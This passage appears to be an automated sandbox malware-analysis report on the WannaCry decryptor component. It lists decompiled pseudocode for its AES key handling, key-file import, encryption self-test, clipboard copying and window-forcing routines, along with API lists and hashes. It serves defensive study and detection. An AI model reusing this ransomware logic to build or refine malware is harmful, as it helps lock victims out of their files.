Yara matches

Similarity

API ID: MetricsSystem$#2379#470#755ClientDrawIconIconicMessageRectSend
String ID:
API String ID: 1397574227-0
Opcode ID: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
Instruction ID: db6533e43e067d2e1cb08ff7c7a85c8aaf9a8b82d3d45c58550572c7a5875683
Opcode Fuzzy Hash: 20468fef4cef0cbb853e64829a62b01e3e2dab64e042f5102f0909ab1ddc92c1
Instruction Fuzzy Hash: 45117F712146069FC214DF38DD49DEBB7E9FBC8304F488A2DF58AC3290DA74E8058B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3C0 Relevance: 12.2, APIs: 8, Instructions: 203
COMMONCrypto

Download Yara Rule

C-Code - Quality: 65%

			E0040B3C0(void* __ebx, void* __ecx, void* __ebp, void* _a4, signed int _a8, signed int _a12, void* _a16) {
				void* _v4;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				struct HWND__* _v32;
				WCHAR* _v36;
				struct HWND__* _t90;
				signed int* _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t109;
				signed int _t113;
				signed int _t114;
				signed int _t121;
				void* _t124;
				signed int _t130;
				signed int _t132;
				signed int _t138;
				signed int _t143;
				signed int _t152;
				signed int _t157;
				void* _t185;
				void* _t188;
				signed int* _t191;
				void* _t204;
				signed int _t206;
				struct HWND__* _t207;
				void* _t211;
				void* _t212;
				void* _t217;
				void* _t218;
				signed int _t221;
				void* _t224;
				signed int* _t226;
				void* _t227;
				void* _t228;

				_t228 = _t227 - 0xc;
				_t124 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
				}
				_t206 = _a12;
				_t185 = 0;
				if(_t206 == 0) {
					L26:
					__imp__??0exception@@QAE@ABQBD@Z(0x4213ac);
					_push(0x41c9c0);
					_push( &_v16);
					L004130FC();
					_push(_t206);
					_t90 = FindWindowW(0, _v36); // executed
					_t207 = _t90;
					if(_t207 != 0) {
						_push(_t185);
						ShowWindow(_t207, 5);
						SetWindowPos(_t207, 0xffffffff, 0, 0, 0, 0, 0x43);
						SetWindowPos(_t207, 0xfffffffe, 0, 0, 0, 0, 0x43);
						SetForegroundWindow(_t207);
						SetFocus(_t207);
						SetActiveWindow(_t207);
						BringWindowToTop(_t207);
						_t90 = _v32;
						if(_t90 != 0) {
							ExitProcess(0);
						}
					}
					return _t90;
				} else {
					_t130 =  *(_t124 + 0x3cc);
					if(_t206 % _t130 != 0) {
						goto L26;
					} else {
						_t100 = _a16;
						if(_t100 != 1) {
							L13:
							_a16 = _t185;
							if(_t100 != 2) {
								L23:
								_t102 = _t206 / _t130;
								_t188 = _a4;
								_t221 = _a8;
								if(_t102 <= 0) {
									goto L11;
								} else {
									do {
										_push(_t221);
										_push(_t188);
										E0040B0C0(_t124);
										_t132 =  *(_t124 + 0x3cc);
										_t188 = _t188 + _t132;
										_t221 = _t221 + _t132;
										_a8 = _a8 + 1;
										_t105 = _t206 / _t132;
									} while (_a8 < _t105);
									return _t105;
								}
							} else {
								_t102 = _t206 / _t130;
								_t191 = _a8;
								_t224 = _a4;
								_a4 = _t191;
								if(_t102 <= 0) {
									goto L11;
								} else {
									while(1) {
										_t50 = _t124 + 0x3f0; // 0x444
										_push(_t191);
										E0040ADC0(_t124);
										_t109 = _t191;
										if( *((intOrPtr*)(_t124 + 4)) == 0) {
											break;
										}
										_t211 = 0;
										if( *(_t124 + 0x3cc) > 0) {
											do {
												 *_t109 =  *_t109 ^  *(_t211 + _t224);
												_t109 =  &(_t109[0]);
												_t211 = _t211 + 1;
											} while (_t211 <  *(_t124 + 0x3cc));
										}
										_t212 = _t224;
										_t56 = _t124 + 0x3f0; // 0x444
										_t138 =  *(_t124 + 0x3cc) >> 2;
										_t113 = memcpy(_t212 + _t138 + _t138, _t212, memcpy(_t56, _t212, _t138 << 2) & 0x00000003);
										_t228 = _t228 + 0x18;
										_t143 =  *(_t124 + 0x3cc);
										_t114 = _t113 / _t143;
										_t224 = _t224 + _t143;
										_v4 = _v4 + _t143;
										_t206 = _a8 + 1;
										_a8 = _t206;
										if(_t206 < _t114) {
											_t191 = _v4;
											continue;
										} else {
											return _t114;
										}
										goto L31;
									}
									__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
									_t130 =  &_v24;
									_push(0x41c9c0);
									_push(_t130);
									L004130FC();
									goto L23;
								}
							}
						} else {
							_t102 = _t206 / _t130;
							_t226 = _a8;
							_a16 = 0;
							if(_t102 <= 0) {
								L11:
								return _t102;
							} else {
								while(1) {
									_push(_t226);
									_push(_a4);
									E0040B0C0(_t124);
									_t100 = _t226;
									if( *((intOrPtr*)(_t124 + 4)) == 0) {
										break;
									}
									_t217 = 0;
									if( *(_t124 + 0x3cc) > 0) {
										_t22 = _t124 - _t226 + 0x3f0; // 0x444
										_t204 = _t22;
										do {
											 *_t100 =  *_t100 ^  *(_t204 + _t100);
											_t100 =  &(_t100[0]);
											_t217 = _t217 + 1;
										} while (_t217 <  *(_t124 + 0x3cc));
									}
									_t218 = _v4;
									_t27 = _t124 + 0x3f0; // 0x444
									_t152 =  *(_t124 + 0x3cc) >> 2;
									_t121 = memcpy(_t218 + _t152 + _t152, _t218, memcpy(_t27, _t218, _t152 << 2) & 0x00000003);
									_t228 = _t228 + 0x18;
									_t157 =  *(_t124 + 0x3cc);
									_t102 = _t121 / _t157;
									_t185 = _v4 + _t157;
									_t226 = _t226 + _t157;
									_t206 = _a8 + 1;
									_v4 = _t185;
									_a8 = _t206;
									if(_t206 < _t102) {
										continue;
									} else {
										goto L11;
									}
									goto L31;
								}
								__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
								_t130 =  &_v24;
								_push(0x41c9c0);
								_push(_t130);
								L004130FC();
								goto L13;
							}
						}
					}
				}
				L31:
			}

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
Instruction ID: 0dbcc5357461fba905cfbac0272349747bc27b8ce320a87ccfe5983878451c5e
Opcode Fuzzy Hash: 1e9378705d9ba196d58f13d3cc7227803daa0403281f32e8405f41cd2aefe311
Instruction Fuzzy Hash: 7A61D5316043158BC705DE2998919ABB7E6FFC8704F04497EFC89BB345C738AA06CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00407C30 Relevance: 12.0, APIs: 8, Instructions: 48
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407C30(void* __ecx) {
				int _t9;
				void* _t15;
				void* _t22;
				signed int _t25;
				signed int _t26;
				void* _t39;
				void* _t40;

				_t39 = __ecx;
				_t9 = OpenClipboard( *(__ecx + 0x20));
				if(_t9 == 0) {
					return _t9;
				} else {
					_t22 = GlobalAlloc(2,  *((intOrPtr*)( *(_t39 + 0x508) - 8)) + 1);
					if(_t22 != 0) {
						EmptyClipboard();
						_t40 =  *(_t39 + 0x508);
						_t15 = GlobalLock(_t22);
						_t25 =  *((intOrPtr*)(_t40 - 8)) + 1;
						_t26 = _t25 >> 2;
						memcpy(_t15, _t40, _t26 << 2);
						memcpy(_t40 + _t26 + _t26, _t40, _t25 & 0x00000003);
						GlobalUnlock(_t22);
						SetClipboardData(1, _t22);
						return CloseClipboard();
					}
					return CloseClipboard();
				}
			}

APIs

OpenClipboard.USER32(?), ref: 00407C38
GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
CloseClipboard.USER32 ref: 00407C5B
EmptyClipboard.USER32 ref: 00407C66
GlobalLock.KERNEL32(00000000), ref: 00407C79
GlobalUnlock.KERNEL32(00000000), ref: 00407C92
SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
CloseClipboard.USER32 ref: 00407CA1

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$Close$AllocDataEmptyLockOpenUnlock
String ID:
API String ID: 142981918-0
Opcode ID: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
Instruction ID: 8252ba06fde5d142781bbccc432981ef86be9671d894a3679d09edf034c0945c
Opcode Fuzzy Hash: 93754508b4dfef54d9d98e8e63777799f1bb11e1cbd450fa109b80c0f9b4831a
Instruction Fuzzy Hash: 1D014B71740A05DFD714ABA5EC8DAFBB7A9FB88356B908079F54AC3350CF61AC048B64

Uniqueness

Uniqueness Score: -1.00%

Function 004047C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154
encryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004047C0(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				long* _v8;
				char _v20;
				void _v539;
				char _v540;
				char _v543;
				char _v544;
				intOrPtr _v548;
				char _v552;
				int _v556;
				intOrPtr _v560;
				void* __ebx;
				char _t38;
				void* _t45;
				void* _t48;
				intOrPtr _t63;
				intOrPtr _t67;
				signed int _t76;
				unsigned int _t78;
				signed int _t79;
				long* _t85;
				char _t92;
				void* _t116;
				intOrPtr _t118;
				void* _t120;
				void* _t121;

				_push(0xffffffff);
				_push(0x415e38);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t118;
				_t63 = __ecx;
				_v560 = __ecx;
				_t38 = "TESTDATA"; // 0x54534554
				_v552 = _t38;
				_t67 =  *0x420c64; // 0x41544144
				_v548 = _t67;
				_t92 =  *0x420c68; // 0x0
				_v544 = _t92;
				_v543 = 0;
				_v540 = 0;
				memset( &_v539, 0, 0x7f << 2);
				_t120 = _t118 - 0x21c + 0xc;
				asm("stosw");
				asm("stosb");
				asm("repne scasb");
				_v556 = 0xbadbac;
				if(E004046B0(_t63) == 0) {
					L6:
					 *[fs:0x0] = _v20;
					return 0;
				} else {
					_v8 = 0;
					_t45 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 8, _a4);
					_t121 = _t120 + 0xc;
					if(_t45 == 0) {
						L12:
						_push(0xffffffff);
						_push( &_v20);
						goto L5;
					} else {
						_t76 = _a8;
						_t48 = E004049B0( *((intOrPtr*)(_t63 + 4)), _t63 + 0xc, _t76);
						_t121 = _t121 + 0xc;
						if(_t48 == 0) {
							goto L12;
						} else {
							asm("repne scasb");
							_t78 =  !(_t76 | 0xffffffff);
							_t116 =  &_v552 - _t78;
							_t79 = _t78 >> 2;
							memcpy(_t116 + _t79 + _t79, _t116, memcpy( &_v540, _t116, _t79 << 2) & 0x00000003);
							_t121 = _t121 + 0x18;
							_push(0x200);
							_push( &_v556);
							_push( &_v540);
							_push(0);
							_push(1);
							_push(0);
							_push( *((intOrPtr*)(_t63 + 8)));
							if( *0x4217cc() != 0) {
								_t85 =  *(_t63 + 0xc);
								if(CryptDecrypt(_t85, 0, 1, 0,  &_v540,  &_v556) != 0) {
									asm("repne scasb");
									if(strncmp( &_v540,  &_v552,  !(_t85 | 0xffffffff) - 1) != 0) {
										_v8 = 0xffffffff;
										E004049A6(_t63);
										goto L6;
									} else {
										_push(0xffffffff);
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L5;
								}
							} else {
								_push(0xffffffff);
								_push( &_v20);
								L5:
								L00413056();
								goto L6;
							}
						}
					}
				}
			}

APIs

Part of subcall function 004046B0: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,0040484E), ref: 004046CD

Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7

CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200), ref: 004048DB
_local_unwind2.MSVCRT ref: 004048EB
CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?), ref: 00404920
strncmp.MSVCRT(00000000,?), ref: 00404951
_local_unwind2.MSVCRT ref: 00404964

Strings

TESTDATA, xrefs: 004047EE

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Crypt_local_unwind2$File$AcquireContextCreateDecryptEncryptSizestrncmp
String ID: TESTDATA
API String ID: 154225373-1607903762
Opcode ID: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
Instruction ID: 12943b98363484da7d263465f98eb3331ab271d68fc45af0c4cd497e7be75c93
Opcode Fuzzy Hash: 20c9666a7ffcf9d4be304aa18a7e829ae4cc28ed87e3f3fd2989e324c574ec42
Instruction Fuzzy Hash: 21512DB6600218ABCB24CB64DC45BEBB7B4FB98320F10477DF915A72C1EB749A44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 004049B0 Relevance: 10.6, APIs: 7, Instructions: 107
fileCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E004049B0(long* _a4, HCRYPTKEY* _a8, CHAR* _a12) {
				int _v8;
				char _v20;
				long _v32;
				int _v36;
				long _v40;
				void* _v44;
				long _t24;
				int _t28;
				BYTE* _t35;
				void* _t46;
				long _t51;
				intOrPtr _t53;

				_push(0xffffffff);
				_push(0x415e48);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_v44 = 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t46 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t46;
				if(_t46 == 0xffffffff) {
					L10:
					_push(0xffffffff);
					goto L11;
				} else {
					_t24 = GetFileSize(_t46, 0);
					_t51 = _t24;
					_v40 = _t51;
					if(_t51 != 0xffffffff) {
						if(_t51 <= 0x19000) {
							_t35 = GlobalAlloc(0, _t51);
							_v36 = _t35;
							if(_t35 == 0) {
								goto L10;
							} else {
								if(ReadFile(_t46, _t35, _t51,  &_v32, 0) != 0) {
									_t28 = CryptImportKey(_a4, _t35, _v32, 0, 0, _a8);
									_push(0xffffffff);
									if(_t28 == 0) {
										L11:
										_push( &_v20);
										goto L12;
									} else {
										_push( &_v20);
										L00413056();
										 *[fs:0x0] = _v20;
										return 1;
									}
								} else {
									_push(0xffffffff);
									_push( &_v20);
									goto L12;
								}
							}
						} else {
							_push(0xffffffff);
							_push( &_v20);
							goto L12;
						}
					} else {
						_push(_t24);
						_push( &_v20);
						L12:
						L00413056();
						 *[fs:0x0] = _v20;
						return 0;
					}
				}
			}

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
_local_unwind2.MSVCRT ref: 00404AC7

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: File$CreateSize_local_unwind2
String ID:
API String ID: 1039228802-0
Opcode ID: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
Instruction ID: 027920ce5e1762b5ae47f20262b5a931ea28e629a989eecbafe96ff87ad0b853
Opcode Fuzzy Hash: 90535d59a0f2dbe90f1bf53ea38d3d76a54ffae39caaa8181d17ff2389417ade
Instruction Fuzzy Hash: 723153B1A40219BBDB10DF98DC84FFFB6ACE789771F14472AF525A22C0D33859018B68

Uniqueness

Uniqueness Score: -1.00%

Function 00406C20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00406C20(void* __ecx) {
				void _v51;
				void* _v52;
				signed int _t14;
				void* _t26;
				char* _t30;
				unsigned int _t36;
				signed int _t37;
				void* _t55;

				_t26 = __ecx;
				_v52 = 0;
				memset( &_v51, 0, 0xc << 2);
				asm("stosb");
				_t14 = GetUserDefaultLangID();
				_t30 =  &_v52;
				if(GetLocaleInfoA(_t14 & 0x0000ffff, 0x1001, _t30, 0x32) == 0) {
					asm("repne scasb");
					_t36 =  !(_t30 | 0xffffffff);
					_t55 = "English" - _t36;
					_t37 = _t36 >> 2;
					memcpy(_t55 + _t37 + _t37, _t55, memcpy( &_v52, _t55, _t37 << 2) & 0x00000003);
				}
				if(SendMessageA( *(_t26 + 0x80), 0x158, 0,  &_v52) != 0xffffffff) {
					SendMessageA( *(_t26 + 0x80), 0x14d, 0,  &_v52);
					return E00406AE0(_t26);
				} else {
					SendMessageA( *(_t26 + 0x80), 0x14e, 0, 0);
					return E00406AE0(_t26);
				}
			}

APIs

GetUserDefaultLangID.KERNEL32 ref: 00406C3B
GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4

Part of subcall function 00406AE0: #540.MFC42(?,755720C0), ref: 00406B03
Part of subcall function 00406AE0: #3874.MFC42 ref: 00406B1B
Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B29
Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406B41
Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406B59
Part of subcall function 00406AE0: #800.MFC42(?,?,755720C0), ref: 00406B62
Part of subcall function 00406AE0: #800.MFC42 ref: 00406B73
Part of subcall function 00406AE0: GetFileAttributesA.KERNEL32(?), ref: 00406B7D
Part of subcall function 00406AE0: #537.MFC42(msg\), ref: 00406B91
Part of subcall function 00406AE0: #924.MFC42(?,00000000,m_%s.wnry,msg\), ref: 00406BA9
Part of subcall function 00406AE0: sprintf.MSVCRT ref: 00406BBB
Part of subcall function 00406AE0: #800.MFC42(?,?,?,?,?,755720C0), ref: 00406BC4
Part of subcall function 00406AE0: #800.MFC42 ref: 00406BD5
Part of subcall function 00406AE0: #800.MFC42(?), ref: 00406BF5

Strings

English, xrefs: 00406C5D

Memory Dump Source

Source File: 0000001E.00000002.2120431742.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001E.00000002.2120387898.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120581463.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120663157.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001E.00000002.2120741762.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: #800$MessageSend$#537#924sprintf$#3874#540AttributesDefaultFileInfoLangLocaleUser
String ID: English
API String ID: 600832625-3812506524
Opcode ID: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
Instruction ID: 12cb8a10269d81aa60d086da51d7e65d8080bc449a50ca3d57c6290c1d86febe
Opcode Fuzzy Hash: 98bbcc99f84d21185ee3b515649f036d805e480a8587630640b34afead2fff3e
Instruction Fuzzy Hash: F911D3717402006BEB149634DC42BAB7795EBD4720F54863EFE5AEB2D0D9F8A8098794

Uniqueness

Uniqueness Score: -1.00%

Function 0040A150 Relevance: 9.4, APIs: 6, Instructions: 375
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E0040A150(void* __ecx) {
				void* _t170;
				void* _t177;
				unsigned int _t178;
				intOrPtr _t182;
				signed int _t189;
				signed int _t190;
				signed int _t192;
				signed int* _t198;
				signed int* _t203;
				signed int _t214;
				signed int* _t215;
				signed int _t224;
				void* _t236;
				unsigned int _t238;
				signed int _t239;
				signed int _t245;
				signed int _t251;
				void* _t268;
				void* _t275;
				signed int _t276;
				void* _t278;
				signed int _t290;
				int _t292;
				signed int _t293;
				signed int _t317;
				signed int _t321;
				signed int _t337;
				signed int _t353;
				signed int _t355;
				intOrPtr* _t375;
				signed int _t378;
				void* _t385;
				void* _t386;
				void* _t387;
				signed int _t388;
				signed int* _t390;
				void* _t391;
				void* _t392;
				signed int _t395;
				signed int* _t397;
				intOrPtr _t398;
				void* _t399;
				void* _t403;

				_t236 = __ecx;
				if( *((intOrPtr*)(_t399 + 4)) == 0) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				_t170 =  *(_t399 + 0x20);
				if(_t170 != 0x10 && _t170 != 0x18 && _t170 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x1c)) = 0x4213b4;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_t170 = _t399 + 8;
					_push(0x41c9c0);
					_push(_t170);
					L004130FC();
				}
				_t238 =  *(_t399 + 0x24);
				if(_t238 != 0x10 && _t238 != 0x18 && _t238 != 0x20) {
					 *((intOrPtr*)(_t399 + 0x18)) = 0x4213b4;
					_t238 = _t399 + 0xc;
					__imp__??0exception@@QAE@ABQBD@Z(_t399 + 0x18);
					_push(0x41c9c0);
					_push(_t399 + 8);
					L004130FC();
				}
				 *(_t236 + 0x3c8) = _t170;
				 *(_t236 + 0x3cc) = _t238;
				_t290 = _t238;
				_t385 =  *(_t399 + 0x20);
				_t19 = _t236 + 0x3d0; // 0x424
				_t239 = _t238 >> 2;
				memcpy(_t19, _t385, _t239 << 2);
				_t386 = memcpy(_t385 + _t239 + _t239, _t385, _t290 & 0x00000003);
				_t22 = _t236 + 0x3f0; // 0x444
				_t245 =  *(_t236 + 0x3cc) >> 2;
				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
				_t403 = _t399 + 0x30;
				_t177 =  *(_t236 + 0x3c8);
				if(_t177 == 0x10) {
					_t178 =  *(_t236 + 0x3cc);
					if(_t178 != 0x10) {
						asm("sbb eax, eax");
						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
					} else {
						_t182 = 0xa;
					}
					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
				} else {
					if(_t177 == 0x18) {
						asm("sbb ecx, ecx");
						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
					} else {
						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
					}
				}
				asm("cdq");
				_t292 = 0;
				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
				 *(_t403 + 0x2c) = _t251;
				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
					L23:
					_t293 = 0;
					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
						L28:
						_t44 = _t236 + 0x414; // 0x468
						_t387 = _t44;
						asm("cdq");
						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
						 *(_t403 + 0x30) = _t353;
						_t189 =  *(_t403 + 0x24);
						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
						 *(_t403 + 0x10) = _t395;
						if(_t395 <= 0) {
							L31:
							_t388 = 0;
							if(_t395 <= 0) {
								L35:
								if(_t388 >= _t353) {
									L51:
									_t190 = 1;
									 *(_t403 + 0x30) = 1;
									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
										L58:
										 *((char*)(_t236 + 4)) = 1;
										return _t190;
									}
									_t151 = _t236 + 0x208; // 0x25c
									_t397 = _t151;
									do {
										if(_t251 <= 0) {
											goto L57;
										}
										_t390 = _t397;
										_t355 = _t251;
										do {
											_t192 =  *_t390;
											 *(_t403 + 0x24) = _t192;
											_t390 =  &(_t390[1]);
											_t355 = _t355 - 1;
											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
										} while (_t355 != 0);
										_t251 =  *(_t403 + 0x2c);
										L57:
										_t190 =  *(_t403 + 0x30) + 1;
										_t397 =  &(_t397[8]);
										 *(_t403 + 0x30) = _t190;
									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
									goto L58;
								}
								 *(_t403 + 0x28) = 0x41a1b0;
								do {
									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
									if(_t395 == 8) {
										_t104 = _t236 + 0x418; // 0x46c
										_t198 = _t104;
										_t268 = 3;
										do {
											 *_t198 =  *_t198 ^  *(_t198 - 4);
											_t198 =  &(_t198[1]);
											_t268 = _t268 - 1;
										} while (_t268 != 0);
										 *(_t403 + 0x24) =  *(_t236 + 0x420);
										_t275 = 3;
										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
										_t116 = _t236 + 0x428; // 0x47c
										_t203 = _t116;
										do {
											 *_t203 =  *_t203 ^  *(_t203 - 4);
											_t203 =  &(_t203[1]);
											_t275 = _t275 - 1;
										} while (_t275 != 0);
										L46:
										 *(_t403 + 0x24) = 0;
										if(_t395 <= 0) {
											goto L50;
										}
										_t119 = _t236 + 0x414; // 0x468
										_t375 = _t119;
										while(1) {
											_t251 =  *(_t403 + 0x2c);
											if(_t388 >=  *(_t403 + 0x30)) {
												goto L51;
											}
											_t398 =  *_t375;
											asm("cdq");
											_t375 = _t375 + 4;
											_t276 = _t388 / _t251;
											asm("cdq");
											_t317 = _t388 %  *(_t403 + 0x2c);
											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
											_t395 =  *(_t403 + 0x10);
											_t214 =  *(_t403 + 0x24) + 1;
											_t388 = _t388 + 1;
